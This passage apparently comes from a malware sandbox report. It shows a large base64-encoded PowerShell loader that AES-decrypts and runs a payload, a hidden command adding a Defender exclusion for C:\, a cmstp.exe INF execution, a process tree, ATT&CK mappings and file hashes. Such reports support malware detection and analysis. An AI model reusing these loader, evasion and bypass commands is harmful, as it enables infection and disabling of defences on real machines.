KwByAEsAOABsAEgAcABrAG4ATQBjAGsANQBOAHgAVgA5AEwAKwBrAHQAdQBrAHQAMwB1AEEAawBVAE0AYQB1AGYAcgBxAE0ARwArAFEAaQB1AE0AcwBEAGoAOABVAFMAZwBJAHoAcwBaADEANQBDAHkAeABUAGcAagBRADEAVwBDAFgARABUAHMAMABwAHkAagB2AGYAVQBkAE8AZQBvAGwAbAB1AE8ANgBBAHIATAAwAEYAOQBWAEcAdQBiAGgASwA5ADQAagBtADgANQBvAE4AMABMAGMAbQByAGEAZwA5AEgAZQB2AFMAZwBxADYAYgAzAG4ASgBqAGsASgBhAHgALwBnADIAZgBSAEwATQBjAEwAdQBQAG4AVQBqADMARwBuADAASQBXAFgAbwBvAHgAOQBWAFUAcQB2AGYAZwBBAE0ATwAxAE4AQQBPAGEARAB4AG0ANgBIAHEAOQBlAEoANwA4ACsAaQBaAHIAOQBSAFIATwA4AFQATQAzAG0ANgA5ADgAawBUAFgAbQBwADgAZQBOAFAAVwAyAGwAeAA2AG8ARABBAFEASwBGAEwATABHAEwAdQAvAEEAZQBWAFIAagBHAEIAaQBGAEcAUABYAGwAQgBGAGcANwBNADQALwB6AGQAYgBUAE8AdgBNAGEAMQBnAHAAaABOAHAAcABsAGYASABmAGkAdgBOAFIAeAA3AFYAdwBNAHMAKwAwADgAZgBRAG0AegBMAGgAOABoAEMASABTAHoAZABEAHMAawAvAHcAdgBlAEEARABqAHIAaQBYADcAZgBkAEUAdwBxAEwAUABvADIAMgBvAFUAOAB4ADIAbABOAC8ASABMADYARgBrAGUAdQA0AHkAWQB4AEcAcgArADUAOAB5AFYASQBxAEYAcwByADAANAArAGMATgA3AHIAMQBhACsANQBBAG4AaQB5AHcAWgB5AGcAZAA0AHMAMgBKAFQAdQB5AC8AMgB3AFcAYgBOAFEATwA0AHEAcAB6AHQAWgBWADgAdgAvAGoAagAyADAAegBmAHoARABjAFEAagArAGMANgB0ADgAdwB3ADAAUQBTAGoATQBMAG8AbABPAG4AUgArADkAMQBiAFYAdQBvAG8AYQBxAHAAWQAxAE0ATAB6AFIAbABsAFEATABvADUARgBaAHYAZwBIADIATAB4AFoAQwBHAEkAMQBRAHMARABuAGgATABGAEMALwAwAE8AWABnAE0AKwBtADMAeABuAHAANgBMAEsAYQBTADAASABzADgARQBCAGwANABLAHkATQBLAEsANwBwADgAbgBtAGwAWABFAHAAKwA2AFMAdwBtAHcAZwBsADIAQQBDAEYAYgBEADgAUgBKAEYAaQA4AG8AdgBuAEQAKwBOAHIAMQBMAGwASwBmAFoARAAvACsAZwA2AHUATQBKAGcAYQBXAHIAKwBPAHgAVAAvAG8ARABGAGMAMwBLAHUASAByAGcALwA1AHAAdQBWAFcAUAB2AGQAMwBmAGsAUwA0AE8ANgBnAC8AUgBXADIAVgB2AGcAYgBhAHgAbgBOAFQAegB0AGwAMwBPAHQAZgBsAHkASgBZAFIAQwBaAEUATABQAFkALwBIAE4AOQBBAEkAQgAyAHYARgBRAFIAQwA0AGYAVgBlAFQAeQBDAFgASQBzAFAAZABJAG8AZABHADIAOQBBADAAOQA1AFcAbwBOAEQANwBtAHcAWgBhAFoAbAA4AEQAbQA0AEUAeQA5ACsAQgBhAFEAQQBOAGsAOABpAE0AdgBGAEsANQBjADYANwBDACsAagBWADcANwBVAC8AKwAvAEoAbwBOAGQARgA1AG4ANQArAFcAOQBoADkARgBTAFIAZgBqAEoAZwBNADMAdABLAE8AUAAzAGIAQwA0ADUARgBKAHoARgBaAEMAbgAxAHkAYwBRAEsAagA0ADcAUwBYAFQAOQA0AFkARABOAGIATABXAEMAZQBGAEkAWABWAEgAcwBmAFIASwBLAGQAQwBPAEEAbQBMAHQAcQBZADgAcQBiAEMAOQByADEAMQBQAHgANgBsAEkAWAAyAEcALwBwAEIATQBmADQARQAzAHgAawBEAG4AdABoAHAAdABiAHIARwBvAHUAZQBNAFQAagAwAGQASwA3AHcAaQBvAFAARABWAGUAQwBqAHQAegB4AHcAbAB3AHgATQA5AFIATABqAG4AeAAyAG0AawAwAFQAVgBSAGUAOQBFAG8AMAB4AG4AVAAwADcAcABUAEEAKwBQAHYARgBUAFcATQBTAEIAVQBVAEIATQBCAGEAYgBEACsAeQBBAFcAYgAzAFQASABEAGgAcwBZAE8AVgBjAFEAWQBrAFEAKwAwAEcAUgB1AGEAMgBwAGIAMgAvAE8AOABEAHcAcwBNACsATgBlAHkASgBGAC8AagBqAGIAegBvAGUAMABmAFEAbwBvAGsAbABXAGIAVQBtADcANQBPAEEAbgBWAGMAQgB6AGEAawBBAC8AVQBlAHUAdgA3AFkAWQBEAEYATwBJAGQANQBVAE8AYgB4AE4AdQA0AEoAawAwAHEARABjAHAAVABmADEATgAxADUANQBwAHoANwBvAGwAZwBZAGYAYwBEAGkANgAyAEQAcABKADMAVABZADYAVgBlAFkASgBsAEoAcQA3AFMAVQA3AHkAdABjAGcANwBkAE0AeQBkAFEAeABoAGYAcABsAGQAZQBaAFoASgB5AHEAaQBGAHkAeAA3AFEAVQBEAHkAMgBkADkAUgBKAFAANwA2ACsAVwAvAE0AYQB4AG0AKwBUAGMAUwBPAHUANQA1AEoAeAB4AEkAYQBoAGcALwA5ADQATgArAGUAbwB5AG4AVgBJAFkAYwBEAEUAbgAyAHkAWgAvAHcAYQBlAEMAWABKAEkAdgB0AGcAWgBZAFkAMwBTADIARwBtAHIAdABVAGsARwBFAFYAUAB0ADIAMwBzAHcASQAwAHkARgA0AHYAbQBtADQAbQBFAEgAcwBQAFAALwBpAHoAQQBnAFQARgAyAEQAQgBvAGcAYgBWAE4AcgBSAGsAUAA4AE8AWQA1ADUAeQB1ADAAZwBFAG0AMwBiAG4AZQB6AGcAYQBDADIAcABjAHkAOQBXAHgATQBFADQAbgBPAEgATQA3AEsAVAB0AFUAagBzAGwAYwBLADkAWgBLAGoARwBzAE4AKwB0AFEAdgA2AFEAcAB6AFYAYwAwADYAbQB3AEQAQgBLAFMAeABYAEUAVABHAHcAeAAwAGUASQBZAHIAUgAwAEgAUwBBAHgAeABxAG8AMwA5AEoAYwBKAEQAeABkAGgAVQAwAGIAegBsAHYASwB5AGYAaAByADEAdwBtAFAANABCAEoAMAA1AGQAeQBPAHMATwBRAEsATABsAFMAYgArAEYAKwBmAFIAbgBBAGcARgBrAGgAWgB4AEcANQBwADAAWAB5AGcAcwAxAGoAOAB6AEMAeABDAGMAcAB6AFcAKwBlAHAARQAvAFoAOAB0AG0AegBmAHQAcgB0AEsAMgA0AGYANwByACsAMABuAFYATABYAHIASgBRAGkAcQBxAEgAUAB3AFAARwBsAEQAOQByAEYASQBrAGwAdwA2AEkARwAxAFUARgBOAGQARQA2AEUAcgAzADIALwBLADcAWQBrADMAVQBHAFUARAB4AFAAMABXAGcAaABHAFgAQgA2ADEAbQA3AFoAcwBqAFUANgB3AGMAZgBBAFYAOQBjADcAWABzAE8AeQByAE8ATgB4AGcAeQBGAGUAYgBPAFoAOABrAEgAUgBSAFYAWgBNACsAUQBuAFoANwBzADIAYgBBAHgAZgA0AHgAQgA3AGIAdQBIAEwAZAByAE0ANQBrADkAVwBYADkAaAA3AEIASwBtADIAYwA2AFYAegBTAFUAQQBIAG0AQQBTAEEAVABHAHMAMwBoADYAZQAvAFQAKwAvAEcANwA4ADgAOQByADcAUgBJADAAaQBMAHEANABLAHoAVwBTAEsAUgBxAGYARQBaAFYAMgBMAEoAbgBRAHcAUQBmAFAAUABuAGkANwBKADgASgBnAHYAbwB1AEwAVgA3AC8AVABWAGcAUABsAEUAUQBqADUAbAAvADMAeQBjAEwAdAB2AFAARABHADcAYQBqAFYAMgB0AFkAbgAxAGwAagBwADEAVgAyAEEAZQBOAEsASQBnAGEARgB6AFcAZwB4AEEAVwB6AGkALwBCAFgALwAyAFYAWABNAFoASAB4AEkATAB1AEEAbgByADMAYQArAGMAWABOAEEAZwBDAFYAeAB6AGYAUABtAGkAdgA0AGgAdQBWAHUAUgA5AFAAMwBGAFcANwBSAEgAZgBxAGYATQA5AEMAQQB6ADMAMABaAHkAVwBwAEgAcABSAGcAcQAwAEYAUAAvAEEAQQA4AE8AUwAvAE8AUQB0ADAASwB3AGEAcwBtAHIAcQBKAGIASQB2ADUAVwB4AGkAWgB3AE8AbwAyADcANQBpAFkAdwBCAGUAZgArADYAbgBIAGwAagBKAE0AMQAyAHYATQAxAGwARABmAEwAbQBkAHcAZgBaAGIANwA3AGwANQByAEMAcQBrAGkAZwBIADAAZwBNAFMAbAAvAFYAVwBJADEANQBOAGEASQA2AHYAZABOAFUAKwBaAGEAYQBnAFAAdQBSADcAbwBnAE0AcwB4AHkAMABUAG0AbQBsAFEARQBBAFAAWgBXAG4AZwBUAGEAQwBiAGsAWQBqADYATQB0AEsAcABvAFUAYgBTAGoASgBIAHYAYwBRAEwAZAA3AGkASQArAHMAMABzAGgAaABoAEgANAB3AE8AWgAyAGEAcgBRADcAdgB6AEgAaQBiAGEAWgBmAFMAZwBCAEwAegBSAHMAVgBZAEsAKwBWADYAQQAwAFMAZABOAFkAWQBiAHQAcQBTAEkAUABGAEQANQBBADkAWQBXAGkAcABDAHUAUABYAFcANwBQAFcAUgBkAGwAdwBmAHUATgA4ADgAKwBVAE8ATgBEAFQANABSAGkATQBrAG0AcgBLAEEAZABPAE4AWQBaAEMAeABkAGEAaABhAGcAVQAvAG8AWABLAHEAcABWAEkAZQB6ADgAcwByAEEAagB2AEgARwA0AFoARgB0AHcAOABnAG8AcQBPAEgASAA1AGwATAA3AE4AUwB5ADYAVABQAFcAbgA1AFUANQBmADUAUABkAHMATQBEAFkARABaADcAdQBsADIAMQA3AE4AYQBQAEgAdQBQAFYAbwAyAFYATgB2AEsAYwBuAEoAQgAvAFUARwBSAHIATwBBADEAWQBGADkAaAArAEoAbABVAFEAKwBqAFgASABrAEYAbABOAHAAVQBZADIAcgBOAEkAbQA1AHIAYwBSAEEATABJAHkANQBmAG4ASQBYADIAcgB0ADcAZwB2AGYAVAB4AFEANgAvAE4ARAA4AG4AaQB0AFEAcQA5AFEAcAA4AEIATQB3ADgAaABNADQAUQBoAHEAbAByAEIAdAA4AFAAWABQADcAQwA4ADYAVwB2AGgAcgBKACsARQBuAE8AegBoAGwAOQBIAHoAUgBRAEQASQBKADcATwBVAEsAKwB6ADcANQB0ADcAbQB3ADIASQB0ADgAdwBuAG8AZQAvAFIAcgBlAGoAeABLAGMAZwAwAGYAawAzAEkAQwByAFcANABPAC8AdwBVAEoARgBGAG4ANAB6AHkATAB4AFMASwBUAEsAQgBXACsASABQAEgAQQBVAFYATwBIAFoARwB2AHEARQBJAEIAbgBYAEkAQwBRAHMAYwBqAG0ALwB2AHgAagBaAG4AdgBJAEQAbgBBADQAVgBOADUAYwBuADMAZgAzAG4ASgBoAE4AYwA5AFEAeQBCAC8AMgBGAFUASwBsADQAWQBZAEYAdgBoAFUAVgBNACsASQBrAFUAUQAyAFgAOQBsAFYATQAwAGUAawBoADEAOQBCAEIAMABnAFoARAA2AFoAZQArADQAQwBOAGYAaAB2ADkAVgA0AFQAQgA4AEcAMwBNAGoAMwA1ADgAUwB1AGYAUgA0AHoAYQBqADQASgBBAGUATwBWADIAVABiAGgAQQA2AFQATABaAEsASQBJAHoARABRAHoAVgBNAFcANAAxAGYAQgBmAGQAdgByAGcARwB2ADQAVQB4AEMAdQBVAEgAWQBZAGgAVQBGAGgAaAA0ADQAdwB0AEUARgB5AEIAYgB2AHAAMgBEAFgASQBvAE0AbQA5AFoAMgBsAFYATQBnAEgAdgBnAHoAZQB4AHQAYQBpAHIARgA1AG4AZgBsAFMAZwBJAFoAawBtAHgAVgBVAEcAMQBKADAAQQBCAEQAQgBYAFUATQBGAFQAbABQAGoAYwBKACsARgB5ADYAUABuAGcAVAA4AE8ARgBaAGoASwBrAEcAcQBPAEUAMAB4AGsAMAA0AFMASwBGADAAKwBaAG4AQwBTAGUATwBnAE0AYwAvADUAdABEAFcARwB0AFYANgBzAHAATgBPADUASwBmAFQAcgBWAHIAWAA2AHUAcgBRAGUANQA1AEIAeABjAE8AcgBwAFcAVQBEAFgAVABrACsAUQBuADYAdABYAHMAeABSAE4ASAArAHQAbABWAHEAMABhAGEALwBZAEcAagAzAEwAcgBoAGYAZwBsAGQAMwBaADkAVQBoADgAcgA3AGYASQBEAEgATABmAEUAdABrAHQARgArAFMAOQBmAHIAaQAvAGMAVgBjACsAVQBVAHEARwBBAEEARgArAFMARwB3AEYAMABKAG4ARQBzADgAZABSADEAMgBXAGIAaABOAE4AUAB4AFoAdQA3AEIAcABrAHgAcwBGAGwAbQBOADYAVgBnAG0AQgA0ADIAcABiADgAawBaAGEAbwBJAFEAdABpAEkARwBUAG8ASQBOAHcAcABkAG0AdwBNAGIAbwBuAGYASwBmADEAbgBKAFcARgBTAHAAOQBmAEkAawB0AFkAYgBJAFQAWgBXAGoAUgAwAHMARAAvAGgAWQAzAGgASQBGAG0ATgBSAFYAbgAyAEkAaQBNAE8ANwB0AFQAbABUAGUANABlADkASgBIAGYAYQBxAEMAZABnAEsAKwB6AHMANwA4AGUAbgBlADQANQB1AFcAagBSAEMAawBGAFkAZABVAEsASgBqAEYAZQBqAEYAagBYAHcAegBhADgANgBkAGQAcABQAE4ATQBKAE8AVgByAGkAQwBmAEgAdwBGAFQARABxAFIAaQAwAFIAQQBiAFkAaABYAEoAYwBBADAATgBvAFoARwBlAEYARABoAGsATABxAFQAUAAzAFoAQgAwAGsAdABhAFYARgBIAGsAMQA0AHcAdgA1AEYARQBLAEgAOABwAHEASABUADkAYgA4AFQAMgBEAHYAeQBEAFMAMQBkAGwAVQBtAEsAZgBiAFcAUQBFAGcATABhADMANwA4ADQAMgA2AHkAVABEAFEAdABsAE0AZgBVAG0AKwAxAEEAbQBoAFoAQwBQAGQARABuACsAdgBPAEgAaABPAFMAWABCAFcAWAAzAHEAcgBzADIAOQBSAFAAQwAvAE8AagAvAFkARwB4AGcAOQAvAFMAZAA1ADcAMwBGAFIAMgBSAHQAagBBAHoAcwBqADQAMwBnAGMAbQBkAE4AOABWAGIARQAwAGQANAArAHEAeABRAGQAaQB3AEEAUABuAGEAdgBHADEAawBmAFUAawAwAGIAYgA3AEYAdgBhAGMAYwBJAFUAWQB0ADgAegBuADEATABuAE8AcABQAHkATABHAGEAaABQAFEARQBuAEMAbgAxAGIANQBxAHIAZwBnAEwAcwB4AEEAagBDAHcAaAArAEIAMAAxAEsATwBLACsARABhAGIAVwA0AFQAOABWAGYAYQBDAHYAUwBTAFYAUAA0AGgAeQBVAGgAOABGAE0ATAA5AFYATABRAGcAZABQAFYAOQBZACsAcwBmAEsAcwBDAGYANwAzAE4AUgAvADEAKwBhAE4ASgBuAFEARABIAE4AeQA0AHAAaQB2AGQAQQBZAEwAaQBnADkAdwBzADQAaQBFAFIAaQBMAFgALwBTAHoAawBjAFkAOABnAGIANgBmAFUAQwBwAG0AbQB4AEUASgBvAE4AeABUADEAcABWADUANABzADMAUgBzAG0AagBiADYAVgBSAEMAWQBkAEUAVAB3AEoAagBYADcAWgBPAHEAeQBBAHYAeABOAE0AagBxAFkAagBNAHUAegB4AGsAVAAvAG0AOAA1AFMAcwBsAG0AWgB4AHEAZABUAG4AegAxAFkATQBYADQAUQBuAHAARQBaAFgARgBqAFIANwBvAFAAVABYAC8AdQByAGEARwBDAG0AUQBaAFkASwB6ADYATwBJAGkAdABGADAAcABxAE8AVABiAE8AWgAzADcANwBJAFMATwBZAHgASgBVAHAAdABiAHkAdwBjAFQANAA2ADcAMQBLAEIAZwAyAEUARABYAHEASQB3AC8AawB1AEIAWgA1AEEAUgBWAHcAMABEAGEAcQBVAG4AcwBZAGoARQA4AFkAbgB2AGoAcABYAHoAcgBWAFgASABLAGQAeQArAE8ATQA1AHkAdgA4AEsASwBqAGEAawBPADcARwA5AGMAUQByAHYAUwBnADkARwBOAGIAWQBzAEsAWAAxAGQAcwBLAHoAQQBJAG8AMgBVAHIAegBlAHoAQwB4AGQAdwBCAGUAUgArAEEAbQBxAFAAKwBYAG0ARABZAHUANAAxAGUAbABqAGEAWABoAHQAaQA0AEYAVwBOAHIAdQBVAEYAMgBjACsAVQBrAFQAQwBYAHAAZgBNAHEASwBkAFoATQBQAEwAWgBiAHUATQBOAFIANQBhADcASABrAHkAZwBiAFgANQBLADgAKwBqADYAWABFAC8AOAAwADUAWAA0AEEANAAzAFgATgBCAFoAOABPADgASABnAHcATwBzACsAUwBOAEEAdwA2ADAAQgBOADIASQBnAEIAUQB1AHQAQQBKAGkARABVAGQARgAyADYAegBKAG8AYgB1AEIAVABsAGYAcQAxAEkAagBNAEoAUQBBAE8AZwByAGUAaABrAEMANQBzAHkARwBmAFAARABKADgALwBOAEYANgBCADMAeAAyAEgAYQBOAG4AVQBFAEwASABKAGgANwB4AGoATQBrAGcAYQBjAEIASgBTAHgAKwB5AEQAcwBvAFkAcAAzAFYAaABjAGwASgAwAEwANgByAFgAcgB4AGcAdABNAGEAegBuAG4AdgArAEEANgA0AFgATABzAHEAeQBvAC8ATwBhAFkARgBjACsAcABDAFEAVQAxAHAAUwBaAFcAbwBBAEEARQBZAGcAbQBvAHIAZQA3AGcAVQBmAGEAcwBCAGkAbAAxAFoASwBHAHcAZwBRAFYAQwBpAFEAaABXAEIATQB0AEkAbQBQAGQAMABvAFUASwBsAFYAawBlAE4AQQBiAG8AdQBZAEoAcQAwAFEAZQB1AG4ATgBjAGQAUAB1AEUANgBmAHYASABhAGEASgBEADAAbABHAFcAeQB3AHgAVgBCADQARAAxAEoARwA4ADAAVgB4AGsAKwBUAFIAYwBOADMAaAB6AE4ARABjADEAcAAvAGkAUQBkAFUASABvAHcAZwBHAGoAagB2AEoANQA4AGQAUgBnAFgAMABkAEMAWQBZAFAAcQBqAG0ANwBDAFYAdgA2AHEAaABsAGYAZwBjAHYAaQBNAEIAeABUAFoAMwB6ADgAbgAvAHEAVAAxAGcAcQA4AGMAZQBnAEYAZABiAC8AagAyAGIASQAzAFcAMABNAHgAYgA1ADQAbgBrAHQAdgByAEEAbwA5AHEASwBKACsAaQA0AEUAYgAxAG8AVAA0AGUANABvADAATgBKAG0AdgAzAFkAawB1AEUATgBtAFcAaQAwAFQAVQBKADMANQBwAEUAVwAxADgAUABMAG8AagBiAHoAMwBaAC8AYQBaAHQATABYAG0AQgBXAGcAegBUAHYAYQBkAHUAbAB3AHoAVQB1AHUATgB3AE0ATgBhAHAAeAA2AG4ATgB5AGIATwB4AE4AWQBYADQAaQA2AEgAUAA5AHkAYQBjAHEAcABWACsAaABXAGwAYwBsAFcAcgAvAGkAQgBaAHcAcAA3AG0ARwBRAEYAcQBaAGgAMwBnAFMAbgBiAC8AaABzAHUAUQBPAEMAOQB1AGQARgBLADEARQBLAEIARwBRAHQATgBZAHkAeQBSAEgARgBvAEcAMwBrADMARgBsADcARAByAFMAbAA2ADkAZwBPAGwAaABGAG0ASwBWAG8AZgBkAGUAKwBnAFEAMABLAHMATABSAFUALwBMAFIAOQBFAG0AVgBDAFQAMAB2AFEANQBzAG4AawBZAHQAeQBUAEEANgAvAFEAdwBPAFUAPQAiACkADQAKACAAIAAgACAAJABpACAAPQAgACQAZABbADAALgAuADEANQBdAA0ACgAgACAAIAAgACQAZQAgAD0AIAAkAGQAWwAxADYALgAuACgAJABkAC4ATABlAG4AZwB0AGgAIAAtACAAMQApAF0ADQAKACAAIAAgACAAJABhAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQADQAKACAAIAAgACAAJABhAGUAcwAuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwANAAoAIAAgACAAIAAkAGEAZQBzAC4ASwBlAHkAIAA9ACAAJABhAA0ACgAgACAAIAAgACQAYQBlAHMALgBJAFYAIAA9ACAAJABpAA0ACgAgACAAIAAgACQAZABlAGMAIAA9ACAAJABhAGUAcwAuAEMAcgBlAGEAdABlAEQAZQBjAHIAeQBwAHQAbwByACgAKQANAAoAIAAgACAAIAAkAG8AdQB0ACAAPQAgACQAZABlAGMALgBUAHIAYQBuAHMAZgBvAHIAbQBGAGkAbgBhAGwAQgBsAG8AYwBrACgAJABlACwAIAAwACwAIAAkAGUALgBMAGUAbgBnAHQAaAApAA0ACgAgACAAIAAgACQAcgBlAHMAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAbwB1AHQAKQANAAoAIAAgACAAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAHIAZQBzAA0ACgA= -inputFormat xml -outputFormat text
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2800
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ghxwalv4\ghxwalv4.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:600
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4E2B.tmp" "c:\Users\Admin\AppData\Local\Temp\ghxwalv4\CSC25F5039DC5284001B44FF5D341B366.TMP"
        5⤵
        
        PID:4660
  - - C:\windows\system32\cmstp.exe
      "C:\windows\system32\cmstp.exe" /au C:\windows\temp\5peqrxtl.inf
      4⤵
      PID:5052
- - C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
    "C:\Users\Admin\AppData\Local\Temp\RegAsm.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4164

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1488

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1748

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2620

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
"C:\Users\Admin\AppData\Local\Temp\RegAsm.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3364

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

System Binary Proxy Execution

T1218

Regsvcs/Regasm

T1218.009

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fa89610ced3b857417a9b65fb0402e41

SHA1
ee770e99f6ec8b3f0a844ba76b74deb270b63238

SHA256
d7960dcab0d50d627402bbd443872c1ed5e1a79390b5d6f12ca670f08d3f5a0e

SHA512
8e43256e2a3cfdc07684168e14299fa1b5c94223315da4da76a6114e5d65faabbec56a083521c8f019ef817f27d3db8931e2b72938e0bc90654a1c189c51c34b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4aaea8e990963328115bd59dee2bcda8

SHA1
2d7eed0a0a898811d6a149a4545ab3732477c01a

SHA256
d9409a92c971fffde4ef29a4777990224d362ae8d847b583a7bd01b5d80394cc

SHA512
de1b4cd2633996f20d8967a55c654c902f94080ba4d002c8d7fd473d077b5c26d4b3c8064a3c69a9485074560f25764225f42aadde352633f96326ee521fbd50

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4E2B.tmp

Filesize
1KB

MD5
ba0eb3d4f52c43ed2f36a7224cb220df

SHA1
0baf09abf1ff745d2802eee38bd8b46e41f90e2f

SHA256
608f6bf87003ea960829c823201a0b28aafd9eeb6e2234f463b470401027b043

SHA512
4af33885de5266cf4f2be08ff45f4213b566d9c06b60c00004b5f1bdbf2322a7111b5eb036ddf5ee863b817f4d345309e0a7477bff8e93a2237efcff9df52e61

Download Submit
C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

Filesize
32KB

MD5
4b23d0d98c945121994ecde5001cb9ef

SHA1
cf72261a20daf6a0035f1a84f5bbd0bb2e4ac1a4

SHA256
584290c3553d373d1fa4025dc8be39b616a376cb2bb1fd4730dc29c68f4ccb1c

SHA512
20173f542bd9d1d3204f946e697e795b3f5da2610e42b3aafd6fe5bdbfaca1a90f27c9c6701b030b1f013d8f04bec77050c22ea9d63c38dad9af951e4d407636

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2blmw24u.ta3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ghxwalv4\ghxwalv4.dll

Filesize
4KB

MD5
29950085d6467a80ed9287d2083fe6e6

SHA1
566d81fdb4f531535a408e61fcdb83a376b83901

SHA256
daf38fe0b580308e904397226fdadedb5d683f24524dba5f69438bcaea6d99d4

SHA512
87dd0c6f2d9303d71353f2eed214bb384488cbef0c45f9562c404aa2c58ca12f4d1a6272e743c906fed2927805f2f52b93454e2e931e2370ae279af3248f85c1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
06cf6307ed59c562027f88a77d94b5af

SHA1
d06ed867151aee3e996119805c1df42cd7a6f0bf

SHA256
98b4b785babe3d1f964a0c5801f76810b88459ebef2ac52ad6d2909b59270030

SHA512
414602bef501d2b4268814753949127511db603d0a9725c222560b12d53f9f0eb437449c246fb84f6f252d36ec6e6d5d4f40a43ff819bbdfa4c41ed68b9c529d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
5KB

MD5
d71bf7101b3cafe3d03d3cf6a0857624

SHA1
38731b1eccf4452978fc4eeec9b0216db21bcac5

SHA256
520607226301df665af93a811b4340b34b11e0d2f2025a4c2af1f24287c0c6f8

SHA512
0a3f9ef7976ef4f854e86f86eaaa24819c5436c402d72d54f846035f4fbd60482b511ca2592d2be49b811eab1cc7ecabc7f21e495aa185cf1705f244facc3d92

Download Submit
C:\windows\temp\5peqrxtl.inf

Filesize
622B

MD5
018502ac4a5c24da82f568213428dce1

SHA1
7c93907925720916d0cc34f7fb47f30ce4e0c96b

SHA256
e736f84e93c335e9067f14027d80b0d79e888b57bc16887de23bb88d315b064e

SHA512
acab30b8079223b15aa5c7144ade22eaaed5889163e25fc389a9500c7f7869d71fc550c10f0eed7532cd28e54de8ec07d20ed25af1619d095020c22ce9dbd0fa

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ghxwalv4\CSC25F5039DC5284001B44FF5D341B366.TMP

Filesize
652B

MD5
65b74b2d82bd8a82f9c823d355781dd6

SHA1
4b1e1f729448b5a98cbbf28a7fad70e9b67c7de6

SHA256
b7e738895e021f7a95add36dd39d807986ec86e46fb67ce72a8554fce94f8ae0

SHA512
